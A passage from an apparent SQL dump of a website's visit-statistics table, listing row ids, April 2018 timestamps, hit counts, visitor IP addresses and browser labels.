,0,'8.29.198.27','other'),(235288,1524492370,2,2,0,0,'37.55.56.67','chrome'),(235289,1524492768,1,1,0,0,'92.113.22.92','chrome'),(235290,1524493117,1,1,0,0,'95.135.23.142','chrome'),(235291,1524493222,1,1,0,0,'91.196.177.46','chrome'),(235292,1524493346,2,2,0,0,'91.196.178.90','chrome'),(235293,1524493504,1,1,0,0,'216.244.66.237','other'),(235294,1524493766,3,3,0,0,'81.163.112.98','other'),(235295,1524494109,2,2,0,0,'91.196.179.25','chrome'),(235296,1524494252,1,1,0,0,'141.8.142.74','other'),(235297,1524494525,1,1,0,0,'66.249.66.158','chrome'),(235298,1524494866,1,1,0,0,'188.230.43.254','other'),(235299,1524494872,1,1,0,0,'217.69.133.4','other'),(235300,1524495291,2,0,2,0,'66.249.66.195',''),(235301,1524495436,1,0,1,0,'66.249.66.201',''),(235302,1524495798,1,1,0,0,'151.82.5.37','chrome'),(235303,1524495983,1,1,0,0,'91.196.178.85','firefox'),(235304,1524496085,1,1,0,0,'37.9.113.101','other'),(235305,1524496169,1,1,0,0,'141.8.142.74','other'),(235306,1524497264,1,1,0,0,'188.230.43.254','other'),(235307,1524497672,1,0,1,0,'66.249.66.201',''),(235308,1524498122,1,1,0,0,'8.29.198.27','other'),(235309,1524498335,1,1,0,0,'91.207.245.147','chrome'),(235310,1524498806,1,1,0,0,'37.73.202.188','chrome'),(235311,1524499336,1,1,0,0,'194.213.105.9','firefox'),(235312,1524499346,1,1,0,0,'178.154.200.41','other'),(235313,1524499661,1,1,0,0,'188.230.43.254','other'),(235315,1524500255,4,4,0,0,'88.253.154.74','other'),(235316,1524500454,1,1,0,0,'40.77.167.73','other'),(235317,1524501089,1,1,0,0,'35.226.23.240','other'),(235318,1524501407,1,1,0,0,'141.8.142.74','other'),(235319,1524501618,2,2,0,0,'91.196.178.168','chrome'),(235320,1524501623,1,0,1,0,'66.249.66.201',''),(235321,1524501842,3,3,0,0,'216.244.66.237','other'),(235322,1524501859,1,1,0,0,'66.249.66.157','chrome'),(235323,1524502063,1,1,0,0,'188.230.43.254','other'),(235324,1524502542,1,1,0,0,'157.55.39.130','other'),(235325,1524502749,1,1,0,0,'8.29.198.25','other'),(235326,1524502943,1,0,1,0,'66.249.66.201',''),(235327,1524502978,1,1,0,0,'178.154.171.88','other'),(235328,1524503354,1,1,0,0,'216.244.66.237','other'),(235329,1524504315,1,1,0,0,'216.244.66.237','other'),(235330,1524504468,1,1,0,0,'188.230.43.254','other'),(235331,1524504587,1,1,0,0,'87.250.224.46','other'),(235332,1524504849,1,1,0,0,'46.161.9.39','firefox'),(235333,1524505011,2,2,0,0,'37.54.21.168','chrome'),(235334,1524505392,2,2,0,0,'141.8.142.74','other'),(235335,1524505548,2,2,0,0,'87.250.224.46','other'),(235336,1524506180,1,1,0,0,'157.55.39.130','other'),(235337,1524506263,1,1,0,0,'178.154.171.88','other'),(235338,1524506442,1,1,0,0,'91.196.178.85','firefox'),(235339,1524506814,1,1,0,0,'66.249.66.201','chrome'),(235340,1524507200,1,1,0,0,'66.249.66.157','chrome'),(235341,1524507933,2,2,0,0,'141.8.142.74','other'),(235342,1524508550,1,1,0,0,'54.187.196.137','firefox'),(235343,1524508552,3,3,0,0,'54.187.196.137','chrome'),(235344,1524508559,2,2,0,0,'91.196.178.42','chrome'),(235345,1524508960,1,1,0,0,'8.29.198.25','other'),(235346,1524509183,1,1,0,0,'54.38.137.72','chrome'),(235347,1524509698,1,0,1,0,'66.249.66.156',''),(235348,1524509882,1,1,0,0,'207.244.149.108','chrome'),(235349,1524509991,2,2,0,0,'37.54.21.32','chrome'),(235350,1524510098,1,1,0,0,'216.244.66.237','other'),(235351,1524510161,1,1,0,0,'54.165.59.7','other'),(235352,1524510631,1,1,0,0,'185.224.133.183','firefox'),(235353,1524510737,1,1,0,0,'94.178.113.51','chrome'),(235354,1524510806,1,1,0,0,'178.154.171.88','other'),(235355,1524511057,1,1,0,0,'216.244.66.237','other'),(235356,1524511176,1,1,0,0,'141.8.142.74','other'),(235357,1524511277,1,1,0,0,'207.46.13.52','other'),(235358,1524512347,1,0,1,0,'66.249.66.199',''),(235359,1524512996,1,1,0,0,'66.249.66.157','chrome'),(235360,1524513049,1,1,0,0,'66.249.66.195','chrome'),(235361,1524513574,1,1,0,0,'8.29.198.25','other'),(235362,1524513995,1,1,0,0,'185.224.133.183','firefox'),(235363,1524514426,33,33,0,0,'77.175.184.55','other'),(235364,1524514786,1,1,0,0,'141.8.132.19','other'),(235365,1524514935,1,1,0,0,'207.46.13.52','other'),(235366,1524514983,1,1,0,0,'216.244.66.237','other'),(235367,1524515834,1,1,0,0,'178.154.171.88','other'),(235368,1524516383,1,1,0,0,'207.46.13.52','other'),(235369,1524517804,1,0,1,0,'66.249.66.201',''),(235370,1524517917,1,1,0,0,'66.249.66.156','chrome'),(235371,1524517930,1,1,0,0,'66.249.66.195','chrome'),(235372,1524518034,1,1,0,0,'87.250.224.46','other'),(235373,1524518353,1,1,0,0,'217.69.133.84','other'),(235374,1524518755,1,1,0,0,'216.244.66.237','other'),(235375,1524519657,1,1,0,0,'141.8.142.74','other'),(235376,1524519793,1,1,0,0,'8.29.198.26','other'),(235377,1524520311,1,1,0,0,'95.132.41.21','other'),(235378,1524521465,3,3,0,0,'141.8.142.74','other'),(235379,1524521962,1,1,0,0,'216.244.66.237','other'),(235380,1524522225,1,1,0,0,'37.9.113.101','other'),(235381,1524524103,1,1,0,0,'207.46.13.37','other'),(235382,1524524156,1,1,0,0,'178.154.171.88','other'),(235383,1524524398,1,1,0,0,'8.29.198.25','other'),(235384,1524524401,1,1,0,0,'35.226.23.240','other'),(235385,1524524924,1,1,0,0,'37.204.43.26','chrome'),(235386,1524525184,1,1,0,0,'141.8.142.74','other'),(235387,1524525237,1,1,0,0,'217.69.133.6','other'),(235388,1524525359,2,2,0,0,'87.250.224.46','other'),(235389,1524525846,1,1,0,0,'37.9.113.182','other'),(235390,1524526069,1,1,0,0,'193.106.30.99','firefox'),(235391,1524526088,1,1,0,0,'66.249.66.199','chrome'),(235392,1524526095,1,1,0,0,'66.249.66.156','chrome'),(235393,1524526579,2,2,0,0,'54.165.59.7','other'),(235394,1524526698,1,1,0,0,'178.154.171.88','other'),(235395,1524528215,1,1,0,0,'216.244.66.237','other'),(235396,1524528936,1,1,0,0,'217.69.143.217','firefox'),(235397,1524530625,1,1,0,0,'8.29.198.26','other'),(235398,1524530861,1,1,0,0,'216.244.66.237','other'),(235399,1524530887,1,1,0,0,'35.226.23.240','other'),(235400,1524532208,1,0,1,0,'66.249.66.201',''),(235401,1524532267,2,2,0,0,'176.9.85.203','other'),(235402,1524532315,1,1,0,0,'207.46.13.38','other'),(235403,1524533379,1,1,0,0,'207.46.13.38','other'),(235404,1524534521,1,1,0,0,'93.180.64.220','other'),(235405,1524535254,1,1,0,0,'8.29.198.25','other'),(235406,1524535309,1,1,0,0,'207.46.13.37','other'),(235407,1524537997,2,2,0,0,'95.213.141.126','opera'),(235408,1524539590,2,2,0,0,'216.244.66.237','other'),(235409,1524541311,1,1,0,0,'193.106.30.99','firefox'),(235410,1524541456,1,1,0,0,'8.29.198.26','other'),(235411,1524541649,1,1,0,0,'148.251.7.6','other'),(235412,1524542814,1,1,0,0,'216.244.66.237','other'),(235413,1524544524,1,1,0,0,'91.196.177.46','chrome'),(235414,1524546087,1,1,0,0,'8.29.198.27','other'),(235415,1524547325,1,1,0,0,'178.92.137.122','firefox'),(235416,1524547582,1,1,0,0,'54.165.59.7','other'),(235417,1524548001,1,1,0,0,'80.252.154.233','chrome'),(235418,1524549114,1,1,0,0,'91.196.178.163','chrome'),(235419,1524549770,1,1,0,0,'91.124.182.170','firefox'),(235420,1524551625,1,1,0,0,'180.76.15.158','other'),(235421,1524551726,2,2,0,0,'91.196.178.69','chrome'),(235422,1524552287,1,1,0,0,'8.29.198.25','other'),(235423,1524552322,2,2,0,0,'162.210.196.100','other'),(235424,1524552386,1,1,0,0,'91.196.178.132','firefox'),(235425,1524552581,1,1,0,0,'185.151.85.170','chrome'),(235426,1524553139,2,2,0,0,'35.226.23.240','other'),(235427,1524553492,1,1,0,0,'54.165.59.7','other'),(235428,1524553611,2,2,0,0,'130.180.219.95','chrome'),(235429,1524554491,1,1,0,0,'46.174.125.28','chrome'),(235430,1524554698,1,1,0,0,'46.219.6.40','chrome'),(235431,1524555245,1,1,0,0,'217.69.133.6','other'),(235432,1524555510,1,1,0,0,'193.106.30.99','firefox'),(235433,1524555589,1,1,0,0,'46.164.139.38','chrome'),(235434,1524555635,1,1,0,0,'46.211.108.249','other'),(235435,1524556723,2,2,0,0,'91.196.177.46','chrome'),(235436,1524556793,1,1,0,0,'46.101.53.32','other'),(235437,1524556818,4,4,0,0,'194.37.248.11','chrome'),(235438,1524556912,1,1,0,0,'8.29.198.25','other'),(235439,1524557288,3,3,0,0,'91.196.179.134','chrome'),(235440,1524557326,1,0,1,0,'66.249.66.195',''),(235441,1524557860,2,2,0,0,'130.180.219.95','chrome'),(235442,1524557997,1,1,0,0,'94.179.38.235','chrome'),(235443,1524558175,1,1,0,0,'194.44.172.210','chrome'),(235444,1524558456,1,1,0,0,'216.244.66.237','other'),(235445,1524559179,1,1,0,0,'46.174.125.28','chrome'),(235446,1524560009,1,1,0,0,'207.46.13.38','other'),(235447,1524560052,4,4,0,0,'194.37.248.11','chrome'),(235448,1524561120,1,0,1,0,'66.249.66.195',''),(235449,1524561379,3,3,0,0,'91.196.178.169','chrome'),(235450,1524561762,1,1,0,0,'91.196.179.134','chrome'),(235451,1524562000,1,1,0,0,'216.244.66.237','other'),(235452,1524562180,1,0,1,0,'66.249.66.158',''),(235453,1524562950,1,1,0,0,'62.205.134.182','other'),(235454,1524563123,1,1,0,0,'8.29.198.27','other'),(235455,1524563335,1,1,0,0,'37.52.17.8','firefox'),(235456,1524563735,1,1,0,0,'198.211.121.79','chrome'),(235457,1524563888,1,1,0,0,'212.8.51.45','firefox'),(235458,1524563916,1,1,0,0,'91.196.178.30','chrome'),(235459,1524564530,2,2,0,0,'91.196.177.15','chrome'),(235460,1524567165,1,1,0,0,'37.55.148.162','chrome'),(235461,1524567746,1,1,0,0,'8.29.198.27','other'),(235462,1524567783,1,1,0,0,'37.9.113.182','other'),(235463,1524568144,1,1,0,0,'178.154.171.88','other'),(235464,1524568609,1,1,0,0,'193.106.30.99','firefox'),(235465,1524570714,1,1,0,0,'178.154.200.41','other'),(235466,1524570717,1,1,0,0,'141.8.142.74','other'),(235467,1524571317,1,1,0,0,'35.226.23.240','other'),(235468,1524571559,1,1,0,0,'180.76.15.28','other'),(235469,1524571761,1,1,0,0,'51.15.65.169','other'),(235470,1524571787,1,1,0,0,'141.8.142.74','other'),(235471,1524571830,1,1,0,0,'157.55.39.152','other'),(235472,1524571990,2,2,0,0,'130.180.209.149','chrome'),(235473,1524572118,2,2,0,0,'91.214.209.229','chrome'),(235474,1524572830,1,1,0,0,'91.124.182.170','firefox'),(235475,1524573199,1,1,0,0,'157.55.39.152','other'),(235476,1524573961,1,1,0,0,'8.29.198.27','other'),(235477,1524574139,1,1,0,0,'91.196.178.93','firefox'),(235478,1524574141,2,2,0,0,'91.196.178.69','chrome'),(235479,1524574568,1,1,0,0,'37.52.17.8','firefox'),(235480,1524574821,1,1,0,0,'178.154.171.88','other'),(235481,1524575058,2,2,0,0,'185.182.81.46','chrome'),(235482,1524575303,2,0,2,0,'66.249.66.195',''),(235483,1524576734,2,2,0,0,'91.196.178.93','chrome'),(235484,1524577338,1,0,1,0,'66.249.66.195',''),(235485,1524577359,2,2,0,0,'91.196.178.2','chrome'),(235486,1524578004,1,1,0,0,'46.174.125.28','chrome'),(235487,1524578574,1,1,0,0,'8.29.198.26','other'),(235488,1524578599,1,0,1,0,'66.249.66.201',''),(235489,1524578747,1,1,0,0,'178.154.200.41','other'),(235490,1524578786,1,1,0,0,'46.242.115.111','msie'),(235491,1524579477,1,1,0,0,'165.225.84.79','chrome'),(235492,1524579902,1,1,0,0,'178.154.171.88','other'),(235493,1524580514,1,1,0,0,'141.8.132.19','other'),(235494,1524581456,1,1,0,0,'217.69.133.203','other'),(235495,1524581624,1,1,0,0,'95.132.32.251','firefox'),(235496,1524581662,1,1,0,0,'91.196.177.15','chrome'),(235497,1524582203,1,1,0,0,'193.106.30.99','firefox'),(235498,1524582502,3,3,0,0,'141.8.142.74','other'),(235499,1524582660,1,1,0,0,'216.244.66.237','other'),(235500,1524582894,1,1,0,0,'178.154.200.41','other'),(235501,1524582938,1,1,0,0,'157.55.39.34','other'),(235502,1524583473,1,1,0,0,'62.205.134.182','other'),(235503,1524583773,1,1,0,0,'141.8.142.74','other'),(235504,1524583956,1,1,0,0,'87.250.224.46','other'),(235505,1524584240,3,0,3,0,'66.249.66.199',''),(235506,1524584800,1,1,0,0,'8.29.198.25','other'),(235507,1524585051,1,1,0,0,'157.55.39.34','other'),(235508,1524587292,1,1,0,0,'216.244.66.237','other'),(235509,1524588251,2,1,1,0,'66.249.66.199',''),(235510,1524588391,2,2,0,0,'216.244.66.237','other'),(235511,1524588651,1,1,0,0,'87.250.224.85','other'),(235512,1524588676,1,1,0,0,'37.9.113.74','other'),(235513,1524588910,1,1,0,0,'141.8.142.96','other'),(235514,1524589373,1,1,0,0,'178.154.171.88','other'),(235515,1524589406,1,1,0,0,'8.29.198.27','other'),(235516,1524590664,1,1,0,0,'91.196.178.88','firefox'),(235517,1524590840,3,3,0,0,'141.8.142.74','other'),(235518,1524591396,2,2,0,0,'91.196.178.164','chrome'),(235519,1524592908,1,0,1,0,'66.249.66.195',''),(235520,1524593204,2,2,0,0,'40.77.167.151','other'),(235521,1524594392,2,2,0,0,'141.8.142.74','other'),(235522,1524595628,1,1,0,0,'8.29.198.26','other'),(235523,1524596202,1,1,0,0,'193.106.30.99','firefox'),(235524,1524597533,2,0,2,0,'66.249.66.199',''),(235525,1524597619,1,1,0,0,'91.209.11.236','other'),(235526,1524598174,1,1,0,0,'178.154.171.88','other'),(235527,1524598258,1,1,0,0,'141.8.142.74','other'),(235528,1524598866,1,0,1,0,'66.249.66.157',''),(235529,1524598892,1,1,0,0,'178.92.155.221','chrome'),(235530,1524598902,1,1,0,0,'178.154.171.55','other'),(235531,1524599850,1,1,0,0,'35.226.23.240','other'),(235532,1524599944,2,2,0,0,'141.8.142.74','other'),(235533,1524600232,1,1,0,0,'8.29.198.27','other'),(235534,1524600557,1,1,0,0,'37.54.192.179','chrome'),(235535,1524600850,1,1,0,0,'178.154.171.88','other'),(235536,1524601101,1,0,1,0,'66.249.66.201',''),(235537,1524602452,1,1,0,0,'37.9.113.182','other'),(235538,1524602461,1,1,0,0,'141.8.142.74','other'),(235539,1524602463,1,1,0,0,'178.154.171.88','other'),(235540,1524602917,46,46,0,0,'54.81.71.187','other'),(235541,1524603122,1,1,0,0,'216.244.66.237','other'),(235542,1524603732,1,1,0,0,'141.8.142.74','other'),(235543,1524603786,1,1,0,0,'66.249.66.199','chrome'),(235544,1524603821,52,52,0,0,'54.81.71.187','other'),(235545,1524604653,1,1,0,0,'216.244.66.237','other'),(235546,1524604989,1,1,0,0,'157.55.39.126','other'),(235547,1524605519,1,1,0,0,'178.154.171.88','other'),(235548,1524606462,1,1,0,0,'8.29.198.27','other'),(235549,1524606812,1,1,0,0,'141.8.142.74','other'),(235550,1524606966,1,0,1,0,'66.249.66.158',''),(235551,1524607190,1,1,0,0,'78.106.114.216','msie'),(235552,1524607804,2,2,0,0,'141.8.142.74','other'),(235553,1524608587,1,1,0,0,'178.154.171.88','other'),(235554,1524609076,1,1,0,0,'141.8.142.74','other'),(235555,1524610081,5,5,0,0,'37.54.114.62','chrome'),(235556,1524610402,1,1,0,0,'193.106.30.99','firefox'),(235557,1524610476,1,1,0,0,'91.209.11.236','other'),(235558,1524610495,1,1,0,0,'87.250.224.46','other'),(235559,1524610513,1,1,0,0,'217.113.119.89','firefox'),(235560,1524610767,1,1,0,0,'217.69.133.3','other'),(235561,1524611079,1,1,0,0,'8.29.198.25','other'),(235562,1524611439,1,0,1,0,'66.249.66.199',''),(235563,1524611481,1,1,0,0,'216.244.66.237','other'),(235564,1524611912,1,1,0,0,'178.154.171.88','other'),(235565,1524612389,1,1,0,0,'207.46.13.87','other'),(235566,1524613348,2,2,0,0,'141.8.142.74','other'),(235567,1524613357,1,1,0,0,'180.76.15.157','other'),(235568,1524613511,1,1,0,0,'87.250.224.46','other'),(235569,1524613993,1,1,0,0,'5.248.165.173','firefox'),(235570,1524614125,1,1,0,0,'207.46.13.87','other'),(235571,1524614512,1,1,0,0,'54.67.59.131','chrome'),(235572,1524615395,1,1,0,0,'46.161.9.39','chrome'),(235573,1524615705,1,1,0,0,'178.154.171.88','other'),(235574,1524615932,1,1,0,0,'216.244.66.237','other'),(235575,1524616763,1,1,0,0,'178.154.171.88','other'),(235576,1524617296,1,1,0,0,'8.29.198.27','other'),(235577,1524617599,1,1,0,0,'216.244.66.237','other'),(235578,1524618312,1,1,0,0,'178.154.171.88','other'),(235579,1524618900,1,1,0,0,'66.249.66.156','chrome'),(235580,1524618908,1,1,0,0,'66.249.66.195','chrome'),(235581,1524619287,1,1,0,0,'141.8.132.19','other'),(235582,1524619468,1,1,0,0,'87.250.224.46','other'),(235583,1524620265,1,1,0,0,'35.226.23.240','other'),(235584,1524621693,1,1,0,0,'37.9.113.182','other'),(235585,1524621892,1,1,0,0,'180.76.15.136','other'),(235586,1524621916,1,1,0,0,'8.29.198.25','other'),(235587,1524621963,1,1,0,0,'178.154.171.88','other'),(235588,1524623191,1,1,0,0,'5.45.207.82','other'),(235589,1524623638,1,1,0,0,'141.8.142.74','other'),(235590,1524624089,1,0,1,0,'66.249.66.201',''),(235591,1524624665,1,1,0,0,'207.46.13.87','other'),(235592,1524624883,1,1,0,0,'178.154.171.88','other'),(235593,1524624893,1,1,0,0,'178.154.171.55','other'),(235594,1524624908,1,1,0,0,'207.46.13.90','other'),(235595,1524625263,1,1,0,0,'5.45.207.58','other'),(235596,1524625990,2,2,0,0,'216.244.66.237','other'),(235597,1524626180,1,1,0,0,'178.154.171.88','other'),(235598,1524626696,1,1,0,0,'37.9.113.110','other'),(235599,1524626847,1,1,0,0,'141.8.142.74','other'),(235600,1524627503,1,1,0,0,'157.55.39.126','other'),(235601,1524628012,1,1,0,0,'141.8.132.22','other'),(235602,1524628136,1,1,0,0,'8.29.198.25','other'),(235603,1524628168,1,1,0,0,'141.8.142.167','other'),(235604,1524628748,1,1,0,0,'141.8.142.96','other'),(235605,1524628763,1,1,0,0,'207.46.13.90','other'),(235606,1524628872,1,1,0,0,'5.45.207.58','other'),(235607,1524629578,1,1,0,0,'87.250.224.85','other'),(235608,1524630123,1,1,0,0,'37.9.113.114','other'),(235609,1524630282,1,1,0,0,'37.9.113.101','other'),(235610,1524630651,1,1,0,0,'216.244.66.237','other'),(235611,1524632085,2,2,0,0,'178.154.171.88','other'),(235612,1524632548,1,1,0,0,'207.46.13.126','other'),(235613,1524632745,1,1,0,0,'8.29.198.27','other'),(235614,1524632934,2,2,0,0,'141.8.142.74','other'),(235615,1524633911,1,1,0,0,'95.135.26.2','chrome'),(235616,1524635280,1,1,0,0,'37.55.148.162','chrome'),(235617,1524635861,2,2,0,0,'91.196.178.134','chrome'),(235618,1524636082,2,2,0,0,'178.154.171.88','other'),(235619,1524636086,1,1,0,0,'141.8.142.74','other'),(235620,1524636936,2,2,0,0,'91.196.178.169','chrome'),(235621,1524637274,1,1,0,0,'176.105.198.37','chrome'),(235622,1524637710,1,1,0,0,'216.244.66.237','other'),(235623,1524637735,1,0,1,0,'66.249.66.158',''),(235624,1524638003,1,1,0,0,'178.154.171.55','other'),(235625,1524638983,1,1,0,0,'8.29.198.27','other'),(235626,1524638994,1,1,0,0,'37.9.113.82','other'),(235627,1524639492,2,2,0,0,'94.178.6.160','chrome'),(235628,1524639688,103,103,0,0,'144.76.8.134','other'),(235629,1524640422,1,1,0,0,'213.180.203.7','other'),(235630,1524640825,1,1,0,0,'216.244.66.237','other'),(235631,1524641514,2,2,0,0,'91.196.178.167','chrome'),(235632,1524641584,1,1,0,0,'157.55.39.126','other'),(235633,1524642049,1,1,0,0,'178.154.200.32','other'),(235634,1524642195,1,1,0,0,'188.226.220.27','chrome'),(235635,1524642350,1,1,0,0,'216.244.66.237','other'),(235636,1524642457,1,1,0,0,'54.165.59.7','other'),(235637,1524642911,1,1,0,0,'91.196.178.69','chrome'),(235638,1524643522,1,1,0,0,'141.8.142.74','other'),(235639,1524643585,1,1,0,0,'8.29.198.26','other'),(235640,1524644057,1,1,0,0,'207.46.13.90','other'),(235641,1524645003,1,1,0,0,'37.53.90.175','chrome'),(235642,1524645018,2,2,0,0,'216.244.66.237','other'),(235643,1524645212,1,1,0,0,'95.132.49.27','firefox'),(235644,1524645547,2,2,0,0,'54.165.59.7','other'),(235645,1524646232,1,1,0,0,'128.69.206.82','msie'),(235646,1524646285,2,2,0,0,'141.8.142.74','other'),(235647,1524646545,1,1,0,0,'54.165.59.7','other'),(235648,1524647119,1,1,0,0,'91.196.178.98','chrome'),(235649,1524647201,1,1,0,0,'91.221.109.101','other'),(235650,1524647230,2,2,0,0,'91.196.178.89','chrome'),(235651,1524648189,1,1,0,0,'207.46.13.126','other'),(235652,1524648271,1,1,0,0,'54.165.59.7','other'),(235653,1524648787,1,1,0,0,'91.196.178.131','firefox'),(235654,1524649325,1,1,0,0,'178.154.171.88','other'),(235655,1524649493,1,1,0,0,'216.244.66.237','other'),(235656,1524649599,1,1,0,0,'54.165.59.7','other'),(235657,1524649819,1,1,0,0,'8.29.198.25','other'),(235658,1524649990,3,3,0,0,'157.55.39.126','other'),(235659,1524651355,1,1,0,0,'54.165.59.7','other'),(235660,1524651656,1,1,0,0,'141.8.142.74','other'),(235661,1524652232,1,1,0,0,'178.154.171.88','other'),(235662,1524652293,1,1,0,0,'37.52.162.66','chrome'),(235663,1524652436,1,0,1,0,'66.249.66.195',''),(235664,1524652463,1,1,0,0,'35.226.23.240','other'),(235665,1524652481,1,1,0,0,'216.244.66.237','other'),(235666,1524652611,1,1,0,0,'141.8.132.22','other'),(235667,1524652961,1,1,0,0,'37.9.113.157','other'),(235668,1524653354,2,2,0,0,'37.9.113.182','other'),(235669,1524653371,1,1,0,0,'178.154.171.88','other'),(235670,1524653573,1,1,0,0,'141.8.142.74','other'),(235671,1524654055,1,0,1,0,'66.249.66.195',''),(235672,1524654419,1,1,0,0,'8.29.198.26','other'),(235673,1524655593,1,0,1,0,'66.249.66.199',''),(235674,1524657277,2,2,0,0,'91.196.178.69','chrome'),(235675,1524657765,2,2,0,0,'216.244.66.237','other'),(235676,1524658774,1,1,0,0,'46.201.113.122','chrome'),(235677,1524658888,1,1,0,0,'37.73.245.58','chrome'),(235678,1524659572,1,1,0,0,'37.53.208.227','chrome'),(235679,1524659634,1,1,0,0,'61.151.226.77','chrome'),(235680,1524659635,1,1,0,0,'101.226.233.154','chrome'),(235681,1524660149,2,2,0,0,'91.196.178.169','chrome'),(235682,1524660532,1,1,0,0,'141.8.142.74','other'),(235683,1524660584,3,3,0,0,'216.244.66.237','other'),(235684,1524660659,1,1,0,0,'8.29.198.25','other'),(235685,1524661192,1,1,0,0,'157.55.39.126','other'),(235686,1524661280,1,0,1,0,'66.249.66.195',''),(235687,1524661479,1,1,0,0,'180.76.15.8','other'),(235688,1524661797,1,1,0,0,'128.72.209.129','msie'),(235689,1524662060,300,300,0,0,'136.243.73.76','other'),(235690,1524662293,1,1,0,0,'217.69.133.194','other'),(235691,1524663076,1,1,0,0,'216.145.11.94','firefox'),(235692,1524663235,1,1,0,0,'162.210.196.100','other'),(235693,1524663237,1,0,1,0,'66.249.66.201',''),(235694,1524663250,1,1,0,0,'46.174.240.204','chrome'),(235695,1524663713,2,2,0,0,'95.132.49.27','firefox'),(235696,1524663883,1,1,0,0,'216.244.66.237','other'),(235697,1524664034,1,1,0,0,'46.211.110.77','other'),(235698,1524664059,1,0,1,0,'66.249.66.195',''),(235699,1524664540,1,1,0,0,'199.58.86.209','other'),(235700,1524664715,13,13,0,0,'23.237.4.26','other'),(235701,1524665070,1,1,0,0,'95.132.49.27','firefox'),(235702,1524665249,1,1,0,0,'8.29.198.27','other'),(235703,1524665308,1,1,0,0,'216.244.66.237','other'),(235704,1524665595,1,1,0,0,'66.102.9.35','chrome'),(235705,1524666345,1,1,0,0,'216.244.66.237','other'),(235706,1524667689,1,1,0,0,'87.250.224.46','other'),(235707,1524667825,1,1,0,0,'216.244.66.237','other'),(235708,1524668301,2,2,0,0,'141.8.142.74','other'),(235709,1524668854,26,26,0,0,'149.56.142.185','other'),(235710,1524669421,1,1,0,0,'91.196.178.66','firefox'),(235711,1524669480,1,1,0,0,'37.73.227.147','chrome'),(235712,1524669785,1,1,0,0,'207.46.13.90','other'),(235713,1524669795,1,1,0,0,'185.177.191.25','chrome'),(235714,1524670442,1,1,0,0,'87.250.224.46','other'),(235715,1524671511,1,1,0,0,'8.29.198.25','other'),(235716,1524671552,1,1,0,0,'93.78.212.230','firefox'),(235717,1524671674,1,1,0,0,'180.76.15.163','other'),(235718,1524671765,1,0,1,0,'66.249.66.195',''),(235719,1524671856,1,1,0,0,'212.1.108.150','chrome'),(235720,1524672198,1,1,0,0,'195.80.141.7','chrome'),(235721,1524672243,1,1,0,0,'157.55.39.126','other'),(235722,1524672489,1,0,1,0,'66.249.66.201',''),(235723,1524672621,25,25,0,0,'158.69.252.151','other'),(235724,1524672719,6,6,0,0,'95.216.11.179','other'),(235725,1524673948,1,1,0,0,'216.244.66.237','other'),(235726,1524675429,14,14,0,0,'95.216.11.179','other'),(235727,1524676081,1,1,0,0,'8.29.198.26','other'),(235728,1524676662,1,1,0,0,'216.244.66.237','other'),(235729,1524676861,1,1,0,0,'195.234.7.18','chrome'),(235730,1524676974,1,1,0,0,'141.8.142.74','other'),(235731,1524677016,1,1,0,0,'87.250.224.46','other'),(235732,1524677864,1,0,1,0,'66.249.66.201',''),(235733,1524678194,1,1,0,0,'216.244.66.237','other'),(235734,1524678313,1,1,0,0,'207.46.13.87','other'),(235735,1524679210,1,1,0,0,'178.140.119.206','msie'),(235736,1524679370,1,1,0,0,'141.8.142.74','other'),(235737,1524680029,2,2,0,0,'91.196.178.161','chrome'),(235738,1524680451,1,0,1,0,'66.249.66.201',''),(235739,1524681228,1,1,0,0,'87.250.224.46','other'),(235740,1524681258,2,2,0,0,'216.244.66.237','other'),(235741,1524681642,1,1,0,0,'178.255.215.94','other'),(235742,1524681689,1,1,0,0,'207.46.13.126','other'),(235743,1524682363,1,1,0,0,'8.29.198.27','other'),(235744,1524682955,1,1,0,0,'91.196.178.58','chrome'),(235745,1524683065,1,1,0,0,'46.185.2.145','chrome'),(235746,1524683533,1,1,0,0,'207.46.13.90','other'),(235747,1524684313,1,1,0,0,'91.196.178.58','chrome'),(235748,1524684386,1,1,0,0,'178.154.200.41','other'),(235749,1524685720,1,0,1,0,'66.249.66.199',''),(235750,1524685766,1,1,0,0,'178.154.171.88','other'),(235751,1524685959,1,1,0,0,'37.9.113.60','other'),(235752,1524686917,1,1,0,0,'8.29.198.25','other'),(235753,1524688001,1,1,0,0,'216.244.66.237','other'),(235754,1524688578,3,3,0,0,'141.8.142.74','other'),(235755,1524689513,1,1,0,0,'216.244.66.237','other'),(235756,1524689701,1,1,0,0,'87.250.224.46','other'),(235757,1524690451,4,4,0,0,'216.244.66.237','other'),(235758,1524690515,1,1,0,0,'35.226.23.240','other'),(235759,1524691250,1,1,0,0,'141.8.142.74','other'),(235760,1524692292,1,1,0,0,'216.244.66.237','other'),(235761,1524693206,1,1,0,0,'8.29.198.27','other'),(235762,1524693737,1,1,0,0,'141.8.132.19','other'),(235763,1524693740,1,1,0,0,'178.154.200.59','other'),(235764,1524694323,1,1,0,0,'37.9.113.138','other'),(235765,1524694577,1,1,0,0,'35.226.23.240','other'),(235766,1524695188,1,1,0,0,'141.8.132.19','other'),(235767,1524695249,1,1,0,0,'66.249.66.201','chrome'),(235768,1524696023,1,0,1,0,'66.249.66.158',''),(235769,1524696701,1,1,0,0,'178.154.171.88','other'),(235770,1524697764,1,1,0,0,'8.29.198.26','other'),(235771,1524699503,1,0,1,0,'66.249.66.195',''),(235772,1524700081,1,1,0,0,'178.154.171.88','other'),(235773,1524701209,2,2,0,0,'216.244.66.237','other'),(235774,1524701271,1,1,0,0,'35.226.23.240','other'),(235775,1524702529,1,1,0,0,'216.244.66.237','other'),(235776,1524702890,2,2,0,0,'207.46.13.165','other'),(235777,1524703017,33,33,0,0,'77.175.184.55','other'),(235778,1524703221,1,1,0,0,'141.8.142.74','other'),(235779,1524703588,1,1,0,0,'178.154.171.88','other'),(235780,1524704051,1,1,0,0,'8.29.198.25','other'),(235781,1524705077,1,1,0,0,'178.154.171.88','other'),(235782,1524705817,1,1,0,0,'141.8.142.74','other'),(235783,1524706078,1,0,1,0,'66.249.66.195',''),(235784,1524706988,1,1,0,0,'216.244.66.237','other'),(235785,1524707381,1,1,0,0,'87.250.224.46','other'),(235786,1524708329,1,1,0,0,'216.244.66.237','other'),(235787,1524708616,1,1,0,0,'8.29.198.26','other'),(235788,1524708847,1,1,0,0,'178.154.171.88','other'),(235789,1524709046,1,1,0,0,'87.250.224.46','other'),(235790,1524709719,3,3,0,0,'216.244.66.237','other'),(235791,1524709963,1,1,0,0,'141.8.142.74','other'),(235792,1524710724,1,1,0,0,'216.244.66.237','other'),(235793,1524710802,1,1,0,0,'5.45.75.6','chrome'),(235794,1524710985,1,1,0,0,'167.114.1.124','other'),(235795,1524711645,2,2,0,0,'216.244.66.237','other'),(235796,1524711879,1,1,0,0,'178.154.171.88','other'),(235797,1524712394,1,0,1